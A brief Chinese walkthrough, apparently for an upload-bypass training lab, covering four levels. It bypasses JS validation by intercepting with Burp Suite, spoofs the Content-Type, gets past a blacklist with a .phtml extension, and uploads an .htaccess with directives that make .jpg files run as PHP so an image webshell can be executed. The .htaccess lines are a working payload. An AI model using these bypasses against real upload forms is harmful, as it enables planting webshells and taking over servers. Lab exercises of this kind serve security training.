Pass-01 JS校验
burpsuite抓包
Pass-02 校验Content_type
burpsuite抓包
修改Content_Type为image/png
Pass-03 黑名单绕过
.phtml上传绕过
Pass-04 .htaccess绕过
上传.htaccess
内容为
- <FilesMatch "shell.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
- AddType application/x-httpd-php .jpg
上传图片马